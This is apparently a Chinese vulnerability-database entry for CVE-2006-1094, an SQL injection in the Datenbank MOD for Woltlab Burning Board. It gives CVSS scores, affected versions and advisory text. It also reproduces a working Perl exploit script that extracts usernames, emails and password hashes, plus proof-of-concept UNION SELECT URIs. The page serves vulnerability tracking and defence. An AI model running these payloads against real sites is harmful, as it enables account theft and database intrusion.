CVE-2006-1094
CVSS7.5
发布时间 :2006-03-09 08:06:00
修订时间 :2008-09-05 17:01:01
NMCOES    

[原文]SQL injection vulnerability in Datenbank MOD 2.7 and earlier for Woltlab Burning Board allows remote attackers to execute arbitrary SQL commands via the fileid parameter to (1) info_db.php or (2) database.php.


[CNNVD]Woltlab Burning Board Datenbank MOD多个SQL注入漏洞(CNNVD-200603-131)

        在Woltlab Burning Board的Datenbank MOD 2.7及其早期版本中存在SQL注入漏洞,远程攻击者可以通过以下途径,执行任意SQL命令:用于(1) info_db.php或(2) database.php中的字段参数。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:woltlab:burning_board:2.7
cpe:/a:woltlab:burning_board:2.5
cpe:/a:datenbank_module:datenbank_module:2.7
cpe:/a:woltlab:burning_board:2.0_beta_3
cpe:/a:woltlab:burning_board:2.2.2
cpe:/a:woltlab:burning_board:2.3.1
cpe:/a:woltlab:burning_board:1.1.1
cpe:/a:woltlab:burning_board:2.0_beta_5
cpe:/a:woltlab:burning_board:2.3.3
cpe:/a:woltlab:burning_board:2.6
cpe:/a:woltlab:burning_board:2.0_rc1
cpe:/a:woltlab:burning_board:2.4
cpe:/a:woltlab:burning_board:2.0_beta_4
cpe:/a:woltlab:burning_board:2.0_rc2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1094
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1094
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-131
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/16914
(UNKNOWN)  BID  16914
http://www.securityfocus.com/archive/1/426583
(UNKNOWN)  BUGTRAQ  20060301 Woltlab Burning Board 2.x (Datenbank MOD fileid) MultipleVulnerabilities
http://www.nukedx.com/?viewdoc=17
(UNKNOWN)  MISC  http://www.nukedx.com/?viewdoc=17
http://www.osvdb.org/23810
(UNKNOWN)  OSVDB  23810
http://www.osvdb.org/23808
(UNKNOWN)  OSVDB  23808

- 漏洞信息

Woltlab Burning Board Datenbank MOD多个SQL注入漏洞
高危 SQL注入
2006-03-09 00:00:00 2006-03-09 00:00:00
远程  
        在Woltlab Burning Board的Datenbank MOD 2.7及其早期版本中存在SQL注入漏洞,远程攻击者可以通过以下途径,执行任意SQL命令:用于(1) info_db.php或(2) database.php中的字段参数。

- 公告与补丁

        目前厂商还没有提供此漏洞的相关补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本.

- 漏洞信息 (1544)

Woltlab Burning Board 2.x Datenbank MOD (fileid) Remote SQL Injection (EDBID:1544)
php webapps
2006-03-01 Verified
0 nukedx
N/A [点击下载]
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Usage: wbb.pl <victim> <directory> <modpage> <dbnum> <userid>
#Original Advisory: http://www.nukedx.com/?viewdoc=17
use IO::Socket;
if(@ARGV < 5){
print "
+*************************************************************************+
+Woltlab Burning Board 2.x (Datenbank MOD fileid) Remote SQL Injection XPL+
+      Usage: wbb.pl <victim> <directory> <modpage> <dbnum> <userid>      +
+                Example: wbb.pl sux.com / info_db.php  1 1               +
+                  Method found & Exploit scripted by nukedx              +
+*************************************************************************+
";
exit();
}
#Local variables
$wbbserver = $ARGV[0];
$wbbserver =~ s/(http:\/\/)//eg;
$wbbhost = "http://".$wbbserver;
$port = "80";
$wbbdir = $ARGV[1];
$wbbpage  = $ARGV[2];
$wbbdbid = $ARGV[3];
$wbbid = $ARGV[4];
$wbbtar = $wbbpage."?action=file&subkatid=1&noheader=1&fileid=";
$wbbxp = "-1/**/UNION/**/SELECT/**/0,0,0,username,email,0,0,0,0,0,password,0,0,0,0,0,0,0/**/FROM/**/bb".$wbbdbid."_users/**/where/**/userid=".$wbbid;
$wbbreq = $wbbhost.$wbbdir.$wbbtar.$wbbxp;
$tag = "'s";
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $wbbserver\n";
$wbb = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$wbbserver", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $wbb "GET $wbbreq\n";
print $wbb "Host: $wbbserver\n";
print $wbb "Accept: */*\n";
print $wbb "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = <$wbb>) {
if ($answer =~ /<span class=\"smallfont\"><b>(.*?)<\/b> <\/td>/){ 
print "+ Exploit succeed! Getting USERID: $wbbid$tag login information.\n";
print "+ USERNAME: $1\n";
}
if ($answer =~ /([\d,a-f]{32})<\/td>/) { 
print "+ MD5 HASH OF PASSWORD: $1\n";
}
if ($answer =~ /<p><ul>(.*?)<\/ul><\/td>/) { 
print "+ MAIL: $1\n";
print "+ SQL Injection exploit has been succesfully finished.\n";
print "+ Woltlab runs on: $wbbhost$wbbdir\n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /users' doesn't exist /) { 
print "+ This version of Datenbank MOD is vulnerable too but you have speficied wrong database number!\n";
print "+**********************************************************************+\n";
exit(); 
}
if ($answer =~ /number of columns/) { 
print "+ This version of Datenbank MOD is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n";
exit(); 
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";

# nukedx.com [2006-03-01]

# milw0rm.com [2006-03-01]
		

- 漏洞信息

23808
Datenbank MOD for Woltlab Burning Board info_db.php fileid Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

Datenbank MOD for Woltlab Burning Board contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the info_db.php script not properly sanitizing user-supplied input to the 'fileid' variable. This may allow an attacker to inject or manipulate SQL queries in the back-end database.

- 时间线

2006-03-01 2006-03-01
2006-03-01 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Woltlab Burning Board Multiple SQL Injection Vulnerabilities
Input Validation Error 16914
Yes No
2006-03-02 12:00:00 2007-02-16 09:37:00
Mustafa Can Bjorn is credited with the discovery of these vulnerabilities.

- 受影响的程序版本

Woltlab Burning Board 2.7
Woltlab Burning Board 2.6
Woltlab Burning Board 2.5
Woltlab Burning Board 2.4
Woltlab Burning Board 2.3.3
Woltlab Burning Board 2.3.1
Woltlab Burning Board 2.2.2
Woltlab Burning Board 2.0 RC2
Woltlab Burning Board 2.0 RC1
Woltlab Burning Board 2.0 beta 5
Woltlab Burning Board 2.0 beta 4
Woltlab Burning Board 2.0 beta 3
Woltlab Burning Board 1.1.1

- 漏洞讨论

Woltlab Burning Board is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

- 漏洞利用

These issues can be exploited through use of a web client.

The following proof of concept URI are available:

http://www.example.com[WBBDir]/info_db.php?action=file&subkatid=1&noheader=1&fileid=1/**/UNION/**/SELECT/**/0,0,0,username,password,0,0,0,0,0,email,0,0,0,0,0,0,0/**/FROM/**/bb1_users/**/where/**/userid=1

http://www.example.com/[WBBDir]/database.php?
action=file&subkatid=1&noheader=1&fileid=1/**/UNION/**/SELECT/**/0,0,0,username,password,0,0,0,0,0,email,0,0,0,0,0,0,0/**/FROM/**/bb1_users/**/where/**/userid=1

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: mailto:vuldb@securityfocus.com.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站